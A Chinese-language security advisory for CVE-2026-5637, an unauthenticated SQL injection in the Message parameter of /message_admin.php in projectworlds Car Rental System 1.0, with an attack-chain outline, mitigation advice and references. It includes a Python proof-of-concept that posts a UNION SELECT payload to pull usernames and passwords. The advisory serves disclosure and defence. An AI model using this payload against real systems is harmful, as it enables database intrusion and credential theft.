CVE-2026-5637 CVSS 7.3 高危

CVE-2026-5637: projectworlds Car Rental System SQL注入漏洞

披露日期: 2026-04-06

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-5637

漏洞类型

SQL注入

CVSS评分

7.3 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

projectworlds Car Rental System

漏洞概述

projectworlds Car Rental System 1.0版本存在高危SQL注入漏洞。该漏洞位于/message_admin.php文件中，由于对Message参数缺乏有效的安全过滤，导致远程攻击者无需认证即可利用。攻击者通过构造恶意SQL语句，可能导致数据库敏感信息泄露、数据篡改或服务中断。鉴于漏洞利用代码已公开，风险极高，建议尽快修复。

技术细节

该漏洞的核心成因在于projectworlds Car Rental System 1.0在/message_admin.php文件的参数处理组件中，未对用户输入的“Message”参数进行严格的类型检查或转义处理。后端代码直接将该参数拼接到SQL查询语句中执行，从而构成了经典的SQL注入漏洞。根据CVSS向量分析，攻击复杂度低（AC:L），且无需用户交互（UI:N）和权限（PR:N）。攻击者可通过发送包含恶意SQL负载的HTTP请求，利用UNION SELECT查询提取数据库结构、管理员凭证或其他敏感数据。此外，由于攻击可远程发起，且可能影响数据库的完整性（I:L）和可用性（A:L），该漏洞对系统安全构成严重威胁。

攻击链分析

STEP 1

侦察

攻击者识别出目标正在使用projectworlds Car Rental System 1.0，并确定存在/message_admin.php接口。

STEP 2

武器化

攻击者构造特定的SQL注入Payload，旨在绕过简单的输入验证并操纵数据库查询逻辑。

STEP 3

交付

攻击者通过HTTP POST或GET请求，将包含恶意Message参数的数据发送至/message_admin.php端点。

STEP 4

利用

后端服务器解析请求，将恶意参数拼接到SQL语句中并执行，导致非预期的数据库操作。

STEP 5

达成目标

攻击者成功获取数据库敏感信息（如用户密码）、修改数据或导致服务异常。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL (Replace with actual target)
target_url = "http://target-host/message_admin.php"

# Malicious payload demonstrating SQL Injection in 'Message' parameter
# Example payload to test for vulnerability: ' OR '1'='1
payload = {
    "Message": "1' UNION SELECT NULL, username, password FROM users-- -"
}

try:
    response = requests.post(target_url, data=payload)
    # Check if the response indicates a successful SQL injection
    if response.status_code == 200:
        print("[+] Potential SQL Injection vulnerability detected!")
        print("[+] Response length:", len(response.text))
    else:
        print("[-] Request failed or payload incorrect.")
except Exception as e:
    print(f"[!] Error: {e}")

影响范围

projectworlds Car Rental System 1.0

防御指南

临时缓解措施

在官方修复补丁发布前，建议通过WAF（Web应用防火墙）添加规则，拦截针对/message_admin.php的包含SQL关键字（如UNION, SELECT, '）的恶意请求，或暂时禁用该文件的功能以降低风险。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-5637
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-5637
3 Details https://www.cvedetails.com/cve/CVE-2026-5637/
4 VulDB https://vuldb.com/cve/CVE-2026-5637
5 Link https://github.com/eqiya17/collection-of-vulnerabilities/issues/13
6 Link https://vuldb.com/submit/785951
7 Link https://vuldb.com/vuln/355425
8 Link https://vuldb.com/vuln/355425/cti

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表